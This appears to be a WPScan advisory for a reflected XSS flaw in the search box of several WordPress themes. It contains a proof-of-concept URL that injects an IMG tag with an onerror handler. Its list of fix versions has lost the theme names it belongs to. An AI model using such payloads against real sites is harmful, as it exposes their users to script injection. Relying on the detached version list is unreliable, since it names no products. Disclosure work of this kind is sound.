Themes Vulnerabilities
Multiple Themes - Reflected XSS
Description
The themes suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link.
Proof of Concept
https://example.com/?s=katana<IMG """><IMG SRC=/ onerror="alert(1)"></img>/asd/
Affects Themes
No known fix
No known fix
No known fix 
Fixed in 1.1.13
No known fix
Fixed in 1.8.6
No known fix
Fixed in 2.1
Fixed in 1.1.4
Fixed in 1.5.1
No known fix
No known fix
No known fix
Fixed in 3.0.2
Fixed in 1.22
Fixed in 1.2.4
No known fix
Fixed in 1.2.1
Fixed in 1.4.2
No known fix
No known fix
Fixed in 1.2.9
No known fix
No known fix
Fixed in 1.3.0
No known fix
Fixed in 1.2.4
No known fix
No known fix
No known fix
Fixed in 1.2.10
Fixed in 1.1.9
No known fix
No known fix
Fixed in 1.1.3
Fixed in 1.1.0
Fixed in 1.4.6
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
Fixed in 1.5.5
No known fix
Fixed in 1.3.2
Fixed in 1.0.2
Fixed in 1.2.7 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Random Robbie
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-08-14 (about 9 months ago)
Added
2023-08-14 (about 8 months ago)
Last Updated
2023-08-31 (about 8 months ago)
WPScan 